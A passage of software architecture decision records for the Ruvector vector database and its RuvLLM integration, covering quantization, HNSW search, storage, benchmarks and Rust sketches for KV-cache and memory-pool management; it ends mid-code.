pub scale: f32, // Scale factor
}
```
**Characteristics:**
- Compression: 4x (f32 -> u8)
- Distance calculation: Uses average scale for symmetric distance
- Reconstruction error: < 0.4% for typical embedding distributions
#### Product Quantization (8-16x compression)
Divides vectors into subspaces, each quantized independently via k-means codebooks.
```rust
pub struct ProductQuantized {
pub codes: Vec<u8>, // One code per subspace
pub codebooks: Vec<Vec<Vec<f32>>>, // Learned centroids
}
```
**Training:**
- K-means clustering on subspace vectors
- Codebook size typically 256 (fits in u8)
- Iterations: 10-100 for convergence
#### Binary Quantization (32x compression)
Single-bit representation based on sign.
```rust
pub struct BinaryQuantized {
pub bits: Vec<u8>, // Packed bits (8 dimensions per byte)
pub dimensions: usize,
}
```
**Characteristics:**
- Compression: 32x (f32 -> 1 bit)
- Distance: Hamming distance (XOR + popcount)
- Best for: Filtering stage before exact distance on candidates
#### Tiered Compression Strategy
Ruvector automatically manages compression based on access patterns:
| Access Frequency | Format | Compression | Latency |
|-----------------|--------|-------------|---------|
| Hot (>80%) | f32 | 1x | Instant |
| Warm (40-80%) | f16 | 2x | ~1us |
| Cool (10-40%) | Scalar | 4x | ~10us |
| Cold (1-10%) | Product | 8-16x | ~100us |
| Archive (<1%) | Binary | 32x | ~1ms |
### 5. Memory Management
#### Arena Allocator (`arena.rs`)
Bump allocator for batch operations reducing allocation overhead.
#### Lock-Free Structures (`lockfree.rs`)
- Crossbeam-based concurrent data structures
- Lock-free queues for batch ingestion
- Available only on `parallel` feature (not WASM)
#### Cache-Optimized Operations (`cache_optimized.rs`)
- Prefetching hints for sequential access
- Cache-line aligned storage
- NUMA-aware allocation on supported platforms
### 6. Storage Layer (`storage.rs`)
#### Native Storage (REDB)
- ACID transactions
- Memory-mapped vectors
- Configuration persistence
- Connection pooling for multiple VectorDB instances
```rust
const VECTORS_TABLE: TableDefinition<&str, &[u8]> = TableDefinition::new("vectors");
const METADATA_TABLE: TableDefinition<&str, &str> = TableDefinition::new("metadata");
const CONFIG_TABLE: TableDefinition<&str, &str> = TableDefinition::new("config");
```
**Security:**
- Path traversal protection
- Validates relative paths don't escape working directory
#### Memory-Only Storage (`storage_memory.rs`)
- Pure in-memory for WASM
- No persistence
- DashMap for concurrent access
---
## Integration Points
### 1. Policy Memory Store
Ruvector serves as the backing store for AI agent policy memory:
```
+-------------------+ +-------------------+ +-------------------+
| AI Agent | | Policy Memory | | ruvector-core |
| | ----> | (AgenticDB) | ----> | |
| "What action for | | Search similar | | HNSW search |
| this situation?" | | past situations | | with metadata |
+-------------------+ +-------------------+ +-------------------+
```
**Use Cases:**
- Q-learning state-action lookups
- Contextual bandit policy retrieval
- Episodic memory for reasoning
### 2. Session State Index
Real-time session context for conversational AI:
```
+-------------------+ +-------------------+ +-------------------+
| Chat Session | | Session Index | | ruvector-core |
| | ----> | | ----> | |
| Current context | | Find relevant | | Cosine similarity |
| embedding | | past turns | | top-k search |
+-------------------+ +-------------------+ +-------------------+
```
**Requirements:**
- < 10ms latency for interactive use
- Session isolation via namespaces
- TTL-based cleanup
### 3. Witness Log for Audit
Cryptographically-linked audit trail:
```
+-------------------+ +-------------------+ +-------------------+
| Agent Action | | Witness Log | | ruvector-core |
| | ----> | | ----> | |
| Action embedding | | Store with hash | | Append-only |
| + metadata | | chain reference | | with timestamps |
+-------------------+ +-------------------+ +-------------------+
```
**Properties:**
- Immutable entries
- Hash-chain linking
- Semantic searchability
---
## Decision Drivers
### 1. Performance (Sub-millisecond Latency)
| Requirement | Implementation |
|-------------|----------------|
| 61us p50 search | SIMD-optimized distance + HNSW |
| 16,400 QPS | Parallel search with Rayon |
| Batch ingestion | Lock-free queues + bulk insert |
### 2. Memory Efficiency (Quantization Support)
| Requirement | Implementation |
|-------------|----------------|
| 4x compression | Scalar quantization |
| 8-16x compression | Product quantization |
| 32x compression | Binary quantization |
| Automatic tiering | Access pattern tracking |
### 3. Cross-Platform Portability (WASM, Native)
| Platform | Features Available |
|----------|-------------------|
| x86_64 Linux/macOS | Full (SIMD, parallel, storage) |
| ARM64 macOS (Apple Silicon) | Full (NEON, parallel, storage) |
| WASM (browser) | Memory-only, scalar fallback |
| PostgreSQL extension | Full + SQL integration |
### 4. LLM Integration
| Requirement | Implementation |
|-------------|----------------|
| Embedding ingestion | API-based and local providers |
| Semantic search | Cosine/dot product metrics |
| RAG pipeline | Hybrid search + metadata filtering |
---
## Alternatives Considered
### Alternative 1: Pure Python Implementation (NumPy/FAISS)
**Rejected because:**
- 10-100x slower than Rust SIMD
- No WASM support
- GIL contention in concurrent workloads
### Alternative 2: C++ with Bindings
**Rejected because:**
- Memory safety concerns
- Complex cross-compilation
- Build system complexity (CMake)
### Alternative 3: Qdrant/Milvus Integration
**Rejected because:**
- External service dependency
- No WASM support
- Complex deployment for edge use cases
### Alternative 4: GPU-Only Acceleration (CUDA/ROCm)
**Rejected because:**
- Not portable to edge/mobile
- Driver dependencies
- Overkill for < 100M vectors
---
## Consequences
### Benefits
1. **Performance**: Sub-millisecond latency enables real-time AI applications
2. **Portability**: Single codebase runs native, WASM, and PostgreSQL
3. **Memory Efficiency**: 2-32x compression makes large datasets practical on edge
4. **Integration**: Native Rust means zero-cost abstractions for embedding in other systems
5. **Learning**: GNN layers can improve search quality without reindexing
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| HNSW recall < 100% | High | Medium | ef_search tuning, hybrid with exact search |
| Quantization accuracy loss | Medium | Medium | Conformal prediction bounds |
| WASM performance gap | Medium | Low | Specialized WASM-optimized builds |
| API embeddings require external call | High | Low | Local embedding option via ONNX |
### Performance Targets
| Metric | Target | Achieved |
|--------|--------|----------|
| HNSW Search (k=10, 384-dim) | < 100us p50 | 61us |
| HNSW Search (k=100, 384-dim) | < 200us p50 | 164us |
| Cosine Distance (1536-dim) | < 200ns | 143ns |
| Dot Product (384-dim) | < 50ns | 33ns |
| Batch Distance (1000 vectors) | < 500us | 237us |
| QPS (10K vectors, k=10) | > 10K | 16,400 |
---
## Implementation Status
### Completed (v0.1.x)
| Module | Status | Description |
|--------|--------|-------------|
| `simd_intrinsics` | Complete | AVX2/NEON dispatch with scalar fallback |
| `distance` | Complete | All 4 metrics with SimSIMD integration |
| `index/hnsw` | Complete | Full HNSW with serialization |
| `index/flat` | Complete | Linear scan baseline |
| `quantization` | Complete | Scalar, Product, Binary |
| `storage` | Complete | REDB-based with connection pooling |
| `storage_memory` | Complete | In-memory for WASM |
| `types` | Complete | Core types with serde |
| `error` | Complete | Error types with thiserror |
| `vector_db` | Complete | High-level API |
| `agenticdb` | Complete | AI agent memory interface |
### Advanced Features
| Module | Status | Description |
|--------|--------|-------------|
| `advanced_features/filtered_search` | Complete | Metadata-based filtering |
| `advanced_features/hybrid_search` | Complete | Dense + sparse (BM25) |
| `advanced_features/mmr` | Complete | Maximal Marginal Relevance |
| `advanced_features/conformal_prediction` | Complete | Uncertainty quantification |
| `advanced_features/product_quantization` | Complete | Enhanced PQ with training |
### Research Features (`advanced/`)
| Module | Status | Description |
|--------|--------|-------------|
| `hypergraph` | Experimental | Hyperedge relationships |
| `learned_index` | Experimental | Neural index structures |
| `neural_hash` | Experimental | LSH with neural tuning |
| `tda` | Experimental | Topological data analysis |
---
## Feature Flags
| Feature | Default | Description |
|---------|---------|-------------|
| `default` | Yes | simd, storage, hnsw, api-embeddings, parallel |
| `simd` | Yes | SimSIMD acceleration |
| `parallel` | Yes | Rayon parallel processing |
| `storage` | Yes | REDB file-based storage |
| `hnsw` | Yes | HNSW index support |
| `api-embeddings` | Yes | HTTP-based embedding providers |
| `memory-only` | No | Pure in-memory (WASM) |
| `real-embeddings` | No | Deprecated, use api-embeddings |
---
## Dependencies
### Core Dependencies
| Dependency | Version | Purpose |
|------------|---------|---------|
| `hnsw_rs` | workspace | HNSW implementation |
| `simsimd` | workspace | SIMD distance functions |
| `rayon` | workspace | Parallel iteration |
| `redb` | workspace | Embedded database |
| `bincode` | workspace | Binary serialization |
| `dashmap` | workspace | Concurrent hash map |
| `parking_lot` | workspace | Optimized locks |
### Optional Dependencies
| Dependency | Feature | Purpose |
|------------|---------|---------|
| `reqwest` | api-embeddings | HTTP client for embedding APIs |
| `memmap2` | storage | Memory-mapped files |
| `crossbeam` | parallel | Lock-free data structures |
---
## API Examples
### Basic Vector Search
```rust
use ruvector_core::{VectorDB, DistanceMetric, HnswConfig};
// Create database
let config = HnswConfig {
m: 32,
ef_construction: 200,
ef_search: 100,
max_elements: 1_000_000,
};
let mut db = VectorDB::new(384, DistanceMetric::Cosine, config)?;
// Insert vectors
db.insert("doc_1".to_string(), vec![0.1; 384])?;
db.insert("doc_2".to_string(), vec![0.2; 384])?;
// Search
let query = vec![0.15; 384];
let results = db.search(&query, 10)?;
```
### Quantized Search
```rust
use ruvector_core::quantization::{ScalarQuantized, QuantizedVector};
// Quantize vectors for storage
let quantized = ScalarQuantized::quantize(&vector);
// Distance in quantized space
let distance = quantized.distance(&other_quantized);
// Reconstruct if needed
let reconstructed = quantized.reconstruct();
```
### Batch Operations
```rust
use ruvector_core::distance::batch_distances;
// Calculate distances to many vectors in parallel
let distances = batch_distances(
&query,
&corpus_vectors,
DistanceMetric::Cosine,
)?;
```
---
## References
1. Malkov, Y., & Yashunin, D. (2018). "Efficient and robust approximate nearest neighbor search using Hierarchical Navigable Small World graphs." arXiv:1603.09320.
2. Jegou, H., Douze, M., & Schmid, C. (2011). "Product quantization for nearest neighbor search." IEEE TPAMI.
3. RuVector Team. "ruvector-core Benchmarks." /crates/ruvector-core/benches/
4. SimSIMD Documentation. https://github.com/ashvardanian/SimSIMD
---
## Appendix A: SIMD Register Usage
### AVX2 (256-bit registers)
```
+-------+-------+-------+-------+-------+-------+-------+-------+
| f32 | f32 | f32 | f32 | f32 | f32 | f32 | f32 |
+-------+-------+-------+-------+-------+-------+-------+-------+
[0] [1] [2] [3] [4] [5] [6] [7]
Operations per cycle:
- _mm256_loadu_ps: Load 8 floats
- _mm256_sub_ps: 8 subtractions
- _mm256_mul_ps: 8 multiplications
- _mm256_add_ps: 8 additions
```
### NEON (128-bit registers)
```
+-------+-------+-------+-------+
| f32 | f32 | f32 | f32 |
+-------+-------+-------+-------+
[0] [1] [2] [3]
Operations per cycle:
- vld1q_f32: Load 4 floats
- vsubq_f32: 4 subtractions
- vfmaq_f32: 4 fused multiply-add
- vaddvq_f32: Horizontal sum
```
---
## Appendix B: Memory Layout
### VectorEntry
```
+------------------+------------------+------------------+
| id: String | vector: Vec<f32>| metadata: JSON |
| (optional) | (required) | (optional) |
+------------------+------------------+------------------+
```
### HNSW Graph Structure
```
Level 3: [v0] -------- [v5]
\ /
Level 2: [v0] -- [v3] -- [v5] -- [v9]
\ / \ / \
Level 1: [v0]-[v1]-[v3]-[v4]-[v5]-[v7]-[v9]
| | | | | | |
Level 0: [v0]-[v1]-[v2]-[v3]-[v4]-[v5]-[v6]-[v7]-[v8]-[v9]
```
---
## Appendix C: Benchmark Results
### Platform: Apple M2 (ARM64 NEON)
```
HNSW Search k=10 (10K vectors, 384-dim):
p50: 61us
p95: 89us
p99: 112us
Throughput: 16,400 QPS
HNSW Search k=100 (10K vectors, 384-dim):
p50: 164us
p95: 203us
p99: 245us
Throughput: 6,100 QPS
Distance Operations (1536-dim):
Cosine: 143ns
Euclidean: 156ns
Dot Product: 33ns (384-dim)
Batch Distance (1000 vectors, 384-dim):
Parallel (Rayon): 237us
Sequential: 890us
```
### Platform: Intel i7 (AVX2)
```
HNSW Search k=10 (10K vectors, 384-dim):
p50: 72us
p95: 105us
p99: 134us
Throughput: 13,900 QPS
Distance Operations (1536-dim):
Cosine: 128ns
Euclidean: 141ns
Dot Product: 29ns (384-dim)
```
---
## Related Decisions
- **ADR-002**: RuvLLM Integration with Ruvector
- **ADR-003**: SIMD Optimization Strategy
- **ADR-004**: KV Cache Management
- **ADR-005**: WASM Runtime Integration
- **ADR-006**: Memory Management
- **ADR-007**: Security Review & Technical Debt
---
## Implementation Status (v2.1)
| Component | Status | Notes |
|-----------|--------|-------|
| HNSW Index | ✅ Implemented | M=32, ef_construct=256, 16K QPS |
| SIMD Distance | ✅ Implemented | AVX2/NEON with fallback |
| Scalar Quantization | ✅ Implemented | 8-bit with min/max scaling |
| Batch Operations | ✅ Implemented | Rayon parallel distances |
| Graph Store | ✅ Implemented | Adjacency list with metadata |
| Persistence | ✅ Implemented | Binary format with versioning |
**Security Status:** Core components reviewed. No critical vulnerabilities in ruvector-core. See ADR-007 for full audit (RuvLLM-specific issues).
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-18 | Ruvector Architecture Team | Initial version |
| 1.1 | 2026-01-19 | Security Review Agent | Added implementation status, related decisions |

View File

@@ -0,0 +1,878 @@
# ADR-002: RuvLLM Integration with Ruvector
**Status:** Proposed
**Date:** 2026-01-18
**Decision Makers:** Ruvector Architecture Team
**Technical Area:** LLM Serving Runtime / Vector Memory Integration
---
## Context and Problem Statement
RuvLLM is an edge-focused LLM serving runtime designed for portable, high-performance inference across heterogeneous hardware. Built with Rust, SIMD optimizations, and WASM support, RuvLLM aims to deliver sub-millisecond orchestration latency while enabling continuous self-improvement through the SONA (Self-Optimizing Neural Architecture) framework.
The integration with Ruvector provides RuvLLM with intelligent memory capabilities, transforming it from a static inference engine into a learning system that improves with every interaction.
### Current State
RuvLLM currently implements:
- **LFM2 Cortex**: Frozen reasoning engine (135M-2.6B parameters)
- **FastGRNN Router**: Intelligent model selection with sparse + low-rank matrices
- **Graph Attention Engine**: Multi-head attention with edge features
- **SONA Learning Loops**: Three-tier temporal learning (instant/hourly/weekly)
- **SIMD Inference**: Native AVX2/AVX512/SSE4.1 operations
- **Q4 Quantization**: 4-bit weight quantization for memory efficiency
### Key Challenges
1. **Memory Pressure**: Edge devices have limited RAM; KV cache and LoRA adapters compete for resources
2. **Cache Coherency**: Long context sessions require efficient KV cache management with quantization fallback
3. **Learning Without Forgetting**: SONA needs persistent pattern storage that survives restarts
4. **Audit and Debugging**: Production systems require semantic search over execution logs
5. **Cross-Session Learning**: Federated agents need to share learned patterns efficiently
---
## Decision Drivers
### Performance Requirements
- **Orchestration latency**: <1ms end-to-end (embedding + retrieval + routing)
- **KV cache lookup**: <100us for session state recovery
- **Pattern search**: <2ms for HNSW-indexed policy retrieval
- **Memory footprint**: Support 50MB base + variable cache tiers
### Scalability Requirements
- **Concurrent sessions**: 1000+ active sessions with KV cache
- **Pattern capacity**: 100K+ learned patterns in ReasoningBank
- **Witness logs**: Retention of 7+ days of audit data
- **Federated sync**: Efficient pattern transfer between edge nodes
### Portability Requirements
- **WASM support**: Full functionality in browser/edge environments
- **No native dependencies**: sql.js for SQLite, pure-Rust HNSW
- **Platform agnostic**: x86_64, ARM64, WASM32 targets
---
## Considered Options
### Option A: Separate Memory Systems
Maintain independent storage for each concern:
- Redis for session state
- PostgreSQL for audit logs
- Custom file format for learned patterns
**Pros:**
- Specialized tools for each concern
- Familiar operational patterns
**Cons:**
- Multiple systems to manage
- No unified semantic search
- Complex deployment on edge devices
- No cross-concern intelligence
### Option B: Ruvector as Unified Memory Layer
Use Ruvector's vector database with HNSW indexing, graph storage, and metadata capabilities as the single memory substrate for all RuvLLM concerns.
**Pros:**
- Single deployment artifact
- Unified vector search across all data types
- Graph relationships between sessions, patterns, and logs
- WASM-compatible for edge deployment
- Self-learning hooks enable continuous improvement
**Cons:**
- Ruvector must support all access patterns efficiently
- Custom encoding for some data types
- Learning curve for operators
### Option C: Tiered Memory with Ruvector Core
Ruvector handles hot/warm data; external cold storage for archives.
**Pros:**
- Best of both worlds
- Cost-effective long-term storage
**Cons:**
- Additional complexity for tiering logic
- Two systems to manage
---
## Decision Outcome
**Chosen Option: Option B - Ruvector as Unified Memory Layer**
Ruvector provides a cohesive memory substrate that aligns with RuvLLM's edge-first philosophy. The unified HNSW index enables semantic search across policies, sessions, and logs while the graph layer captures relationships between these entities.
### Rationale
1. **Single binary deployment**: Edge devices benefit from one runtime
2. **Semantic unification**: All data becomes searchable by meaning
3. **Graph intelligence**: Relationships between patterns and sessions drive routing
4. **WASM portability**: Both RuvLLM and Ruvector target WASM
5. **SONA alignment**: Three-tier learning maps naturally to Ruvector's architecture
---
## Technical Specifications
### Ruvector Integration Roles
Ruvector serves three distinct but interconnected roles in the RuvLLM architecture:
```
+-----------------------------------------------------------------------+
| RUVECTOR INTEGRATION ARCHITECTURE |
+-----------------------------------------------------------------------+
| |
| +-------------------+ +-------------------+ +--------------+ |
| | POLICY MEMORY | | SESSION STATE | | WITNESS LOG | |
| | STORE | | INDEX | | INDEX | |
| | | | | | | |
| | - Quantization | | - KV cache keys | | - Routing | |
| | thresholds | | - Adapter refs | | decisions | |
| | - Router weights | | - Cache locality | | - Quality | |
| | - EWC++ Fisher | | - Session graphs | | scores | |
| | - Pattern bank | | - Conversation | | - Latency | |
| | | | history | | traces | |
| +--------+----------+ +---------+---------+ +------+-------+ |
| | | | |
| +-------------+------------+----------+-----------+ |
| | | |
| v v |
| +-----------+------------+ +-------+--------+ |
| | HNSW INDEX LAYER | | GRAPH STORE | |
| | (Unified Search) | | (Relations) | |
| +------------------------+ +----------------+ |
| |
+-----------------------------------------------------------------------+
```
#### Role A: Policy Memory Store
Stores learned thresholds and parameters that inform runtime decisions.
**Data Schema:**
```rust
/// Policy entry stored in Ruvector
struct PolicyEntry {
/// Unique identifier
id: Uuid,
/// Policy type: "quantization", "router", "ewc", "pattern"
policy_type: String,
/// Embedding vector for semantic search (768-D)
embedding: Vec<f32>,
/// Policy parameters as JSON
parameters: serde_json::Value,
/// Confidence score from learning
confidence: f32,
/// Fisher information (for EWC++ policies)
fisher_diagonal: Option<Vec<f32>>,
/// Creation timestamp
created_at: DateTime<Utc>,
/// Last accessed (for LRU eviction)
last_accessed: DateTime<Utc>,
/// Source: "instant_loop", "background_loop", "deep_loop", "federated"
source: String,
}
/// Quantization threshold policy
struct QuantizationPolicy {
/// Layer indices affected
layer_range: (usize, usize),
/// Precision: "fp16", "q8", "q4_k", "q4_0"
precision: String,
/// Activation threshold triggering this precision
activation_threshold: f32,
/// Memory budget constraint (bytes)
memory_budget: usize,
/// Learned quality-latency tradeoff
quality_weight: f32,
}
/// Router weight policy
struct RouterPolicy {
/// FastGRNN cell parameters
cell_weights: FastGRNNWeights,
/// Output head biases
head_biases: RouterHeadBiases,
/// EWC regularization strength
ewc_lambda: f32,
/// Training loss at checkpoint
training_loss: f32,
}
```
**Access Patterns:**
- **Write**: After background/deep learning loops complete
- **Read**: On every inference request (cached locally with TTL)
- **Search**: By policy type + semantic similarity to current context
#### Role B: Session State Index
Manages multi-turn conversation state including KV cache references and adapter selection.
**Data Schema:**
```rust
/// Session state entry
struct SessionState {
/// Session identifier
session_id: String,
/// User/tenant identifier
user_id: Option<String>,
/// Embedding of conversation context (768-D)
context_embedding: Vec<f32>,
/// Reference to KV cache location
kv_cache_ref: KvCacheReference,
/// Currently active LoRA adapter ID
active_adapter: Option<String>,
/// Conversation turn count
turn_count: u32,
/// Last activity timestamp
last_active: DateTime<Utc>,
/// Session metadata
metadata: HashMap<String, serde_json::Value>,
}
/// KV cache reference with tiered storage
struct KvCacheReference {
/// Cache storage tier: "hot", "warm", "cold"
tier: CacheTier,
/// Location identifier
location: CacheLocation,
/// Number of cached tokens
cached_tokens: usize,
/// Quantization level of cached KV pairs
quantization: CacheQuantization,
/// Cache creation timestamp
created_at: DateTime<Utc>,
}
/// Two-tier KV cache configuration
enum CacheQuantization {
/// High-precision tail (last N tokens) - FP16
HighPrecisionTail {
tail_length: usize,
precision: String,
},
/// Quantized store (older tokens) - Q4/Q8
QuantizedStore {
precision: String,
compression_ratio: f32,
},
/// Hybrid: tail in FP16, rest in Q4
Hybrid {
tail_length: usize,
tail_precision: String,
store_precision: String,
},
}
```
**Access Patterns:**
- **Write**: On session creation, after each turn, on adapter switch
- **Read**: On every request (session recovery)
- **Search**: By user_id, by context similarity, by adapter requirements
- **Expire**: Background task evicts stale sessions
#### Role C: Witness Log Index
Enables postmortem analysis and audit queries over execution history.
**Data Schema:**
```rust
/// Execution witness log entry
struct WitnessEntry {
/// Unique request identifier
request_id: Uuid,
/// Associated session ID
session_id: String,
/// Query embedding for semantic search (768-D)
query_embedding: Vec<f32>,
/// Routing decision made
routing_decision: RoutingDecision,
/// Model used for generation
model_used: ModelSize,
/// Quality score (0.0 - 1.0) from evaluation
quality_score: f32,
/// End-to-end latency breakdown
latency: LatencyBreakdown,
/// Context documents retrieved
context_doc_ids: Vec<Uuid>,
/// Response embedding for clustering
response_embedding: Vec<f32>,
/// Timestamp
timestamp: DateTime<Utc>,
/// Error details if failed
error: Option<ErrorInfo>,
}
/// Latency breakdown for profiling
struct LatencyBreakdown {
/// Embedding generation time
embedding_ms: f32,
/// HNSW retrieval time
retrieval_ms: f32,
/// Router decision time
routing_ms: f32,
/// Graph attention time
attention_ms: f32,
/// LLM generation time
generation_ms: f32,
/// Total end-to-end time
total_ms: f32,
}
/// Routing decision record
struct RoutingDecision {
/// Selected model
model: ModelSize,
/// Context size bucket
context_size: usize,
/// Temperature used
temperature: f32,
/// Top-p used
top_p: f32,
/// Router confidence
confidence: f32,
/// Model probability distribution
model_probs: [f32; 4],
}
```
**Access Patterns:**
- **Write**: Async after every request completion
- **Read**: On-demand for debugging, analytics dashboards
- **Search**: By time range, by quality threshold, by semantic similarity
- **Aggregate**: Quality trends, latency percentiles, model usage stats
---
### Data Flow Architecture
#### Vector Flow: Embeddings to Ruvector
```
+-----------------------------------------------------------------------+
| VECTOR DATA FLOW |
+-----------------------------------------------------------------------+
| |
| User Query |
| | |
| v |
| +-------------------+ |
| | LFM2 Embedder | (768-D embedding, ~50ms) |
| | - Tokenize | |
| | - Encode | |
| | - Project | |
| | - Normalize | |
| +--------+----------+ |
| | |
| v |
| +--------+----------+ +-------------------+ |
| | Query Embedding |---->| RUVECTOR HNSW | |
| | (768-D vector) | | - M=32, ef=64 | |
| +-------------------+ | - Cosine dist | |
| +---------+---------+ |
| | |
| +--------------+-----------+-----------+ |
| | | | |
| v v v |
| +--------+-------+ +----+--------+ +-------+------+ |
| | Policy Search | | Session | | Context | |
| | (quantization, | | Recovery | | Retrieval | |
| | routing) | | (KV cache) | | (documents) | |
| +----------------+ +-------------+ +--------------+ |
| |
+-----------------------------------------------------------------------+
```
#### Scheduling Decision Flow: Ruvector Informs Routing
```
+-----------------------------------------------------------------------+
| SCHEDULING DECISION FLOW |
+-----------------------------------------------------------------------+
| |
| Query Features (128-D) |
| | |
| +----> Length, complexity, domain signals |
| | |
| v |
| +-------------------+ |
| | POLICY LOOKUP | Search Ruvector for relevant policies |
| +--------+----------+ |
| | |
| v |
| +-------------------+ +-------------------+ |
| | Retrieved | | Historical | |
| | - Quant policy | | - Success rate | |
| | - Router weights | | per model | |
| | - EWC constraints | | - Avg latency | |
| +--------+----------+ +---------+---------+ |
| | | |
| +------------+-------------+ |
| | |
| v |
| +---------------------+------------------+ |
| | FASTGRNN ROUTER | |
| | | |
| | Inputs: | |
| | - Query features (128-D) | |
| | - Policy parameters | |
| | - Historical performance | |
| | | |
| | Outputs: | |
| | - Model selection (350M/700M/1.2B/ | |
| | 2.6B) | |
| | - Context size bucket | |
| | - Temperature, top-p | |
| | - Confidence score | |
| +--------------------+-------------------+ |
| | |
| v |
| +--------------------+-------------------+ |
| | KV CACHE MANAGEMENT | |
| | | |
| | Two-Tier Architecture: | |
| | +----------------+ +---------------+ | |
| | | High-Precision | | Quantized | | |
| | | Tail (FP16) | | Store (Q4/Q8) | | |
| | | Last N tokens | | Older tokens | | |
| | +----------------+ +---------------+ | |
| | | |
| | Decision factors from Ruvector: | |
| | - Session importance score | |
| | - Memory pressure signals | |
| | - Quality requirements | |
| +----------------------------------------+ |
| |
+-----------------------------------------------------------------------+
```
#### Audit Log Indexing Flow
```
+-----------------------------------------------------------------------+
| AUDIT LOG INDEXING |
+-----------------------------------------------------------------------+
| |
| Request Completion |
| | |
| v |
| +-------------------+ |
| | WITNESS BUILDER | Construct audit entry |
| | | |
| | - Query embedding | |
| | - Response embed | |
| | - Routing record | |
| | - Latency trace | |
| | - Quality score | |
| +--------+----------+ |
| | |
| v (async, non-blocking) |
| +-------------------+ |
| | WRITEBACK QUEUE | Batch writes for efficiency |
| | - Max batch: 100 | |
| | - Max wait: 1s | |
| +--------+----------+ |
| | |
| v |
| +-------------------+ +-------------------+ |
| | RUVECTOR INSERT | | GRAPH EDGES | |
| | - HNSW index | | - Session links | |
| | - Metadata store | | - Similar queries | |
| +-------------------+ +-------------------+ |
| |
| Query Patterns: |
| +-------------------+ |
| | POSTMORTEM SEARCH | |
| | | |
| | - "Find requests | |
| | with quality | |
| | < 0.5" | |
| | | |
| | - "Similar errors | |
| | to this one" | |
| | | |
| | - "Latency spikes | |
| | in last hour" | |
| +-------------------+ |
| |
+-----------------------------------------------------------------------+
```
---
### Paged Attention Mechanism (mistral.rs-inspired)
RuvLLM implements a paged attention system inspired by mistral.rs for efficient KV cache management:
```rust
/// Paged attention configuration
struct PagedAttentionConfig {
/// Page size in tokens
page_size: usize, // Default: 16 tokens
/// Maximum pages per sequence
max_pages: usize,
/// Page table size
page_table_capacity: usize,
/// Block allocator strategy
allocation_strategy: AllocationStrategy,
}
/// Two-tier KV cache implementation
struct TwoTierKvCache {
/// High-precision tail: most recent tokens in FP16
/// Critical for attention quality on recent context
high_precision_tail: PagedCache<f16>,
/// Quantized store: older tokens in Q4/Q8
/// Compressed for memory efficiency
quantized_store: PagedCache<QuantizedKv>,
/// Boundary position between tiers
tier_boundary: AtomicUsize,
/// Policy reference from Ruvector
quantization_policy: Arc<RwLock<QuantizationPolicy>>,
}
impl TwoTierKvCache {
/// Append new KV pairs, managing tier transitions
fn append(&mut self, keys: &[f16], values: &[f16]) {
// Add to high-precision tail
self.high_precision_tail.append(keys, values);
// Check if tail exceeds threshold
if self.high_precision_tail.len() > self.policy().tail_threshold {
// Migrate oldest tokens to quantized store
let to_migrate = self.high_precision_tail.pop_oldest(MIGRATION_BATCH);
let quantized = self.quantize_kv_pairs(&to_migrate);
self.quantized_store.append(&quantized);
}
}
/// Attention computation with tier-aware access
fn attend(&self, query: &[f16], mask: &AttentionMask) -> Vec<f16> {
// Compute attention over both tiers
let tail_attn = self.high_precision_tail.attend(query, mask);
let store_attn = self.quantized_store.attend_quantized(query, mask);
// Weighted combination based on position decay
combine_attention(tail_attn, store_attn, &self.position_weights())
}
}
```
---
### Unified Memory Pool Architecture
A single memory pool manages both KV cache and LoRA adapters to prevent fragmentation:
```rust
/// Unified memory pool for KV cache and LoRA adapters
struct UnifiedMemoryPool {
/// Total memory budget
total_budget: usize,
/// Allocations by type
allocations: DashMap<AllocationId, Allocation>,
/// Priority queue for eviction
eviction_queue: Mutex<BinaryHeap<EvictionCandidate>>,
/// Ruvector connection for persistence policies
ruvector: Arc<RuvectorMemory>,
}
/// Allocation types sharing the pool
enum AllocationType {
/// KV cache pages
KvCache {
session_id: String,
tier: CacheTier,
page_count: usize,
},
/// LoRA adapter weights
LoraAdapter {
adapter_id: String,
rank: usize,
layer_count: usize,
},
/// FastGRNN router weights
RouterWeights {
version: u64,
},
}
impl UnifiedMemoryPool {
/// Allocate memory, evicting if necessary
fn allocate(&self, request: AllocationRequest) -> Result<AllocationId> {
let required = request.size_bytes();
// Check available memory
while self.available() < required {
// Evict lowest priority allocation
let victim = self.eviction_queue.lock().pop()
.ok_or(Error::OutOfMemory)?;
// Persist to Ruvector before eviction
self.persist_to_ruvector(&victim)?;
self.free(victim.allocation_id);
}
// Allocate and track
let id = self.do_allocate(request)?;
self.update_eviction_priority(&id);
Ok(id)
}
/// Persist allocation to Ruvector for recovery
fn persist_to_ruvector(&self, alloc: &Allocation) -> Result<()> {
match &alloc.allocation_type {
AllocationType::KvCache { session_id, .. } => {
// Store KV cache reference for later recovery
self.ruvector.store_session_cache_ref(session_id, alloc)?;
}
AllocationType::LoraAdapter { adapter_id, .. } => {
// Store adapter checkpoint
self.ruvector.store_adapter_checkpoint(adapter_id, alloc)?;
}
_ => {}
}
Ok(())
}
}
```
---
### WASM Kernel Packs
Pluggable optimization kernels delivered as WASM modules:
```rust
/// WASM kernel pack interface
trait WasmKernelPack: Send + Sync {
/// Kernel identification
fn id(&self) -> &str;
fn version(&self) -> &str;
/// Capability declarations
fn capabilities(&self) -> KernelCapabilities;
/// Execute kernel
fn execute(&self, inputs: &KernelInputs) -> Result<KernelOutputs>;
}
/// Available kernel types
enum KernelType {
/// Attention computation kernel
Attention {
variant: AttentionVariant, // Standard, Flash, PagedFlash
precision: Precision, // FP16, Q8, Q4
},
/// Matrix multiplication kernel
MatMul {
variant: MatMulVariant, // Standard, Tiled, Strassen
precision: Precision,
},
/// Quantization kernel
Quantize {
from_precision: Precision,
to_precision: Precision,
method: QuantMethod, // RTN, GPTQ, AWQ
},
/// Embedding kernel
Embed {
method: EmbedMethod, // Lookup, Fused
},
}
/// Kernel pack registry with Ruvector-backed discovery
struct KernelRegistry {
/// Loaded kernels
kernels: DashMap<String, Box<dyn WasmKernelPack>>,
/// Ruvector for kernel metadata and selection history
ruvector: Arc<RuvectorMemory>,
/// Runtime selection based on hardware
selector: KernelSelector,
}
impl KernelRegistry {
/// Select optimal kernel for operation
fn select(&self, operation: &Operation) -> Result<&dyn WasmKernelPack> {
// Check Ruvector for learned preferences
let history = self.ruvector.search_kernel_performance(operation)?;
// Select based on historical performance + capabilities
let kernel_id = self.selector.select(operation, &history)?;
self.kernels.get(&kernel_id)
.map(|k| k.value().as_ref())
.ok_or(Error::KernelNotFound)
}
/// Record kernel performance for learning
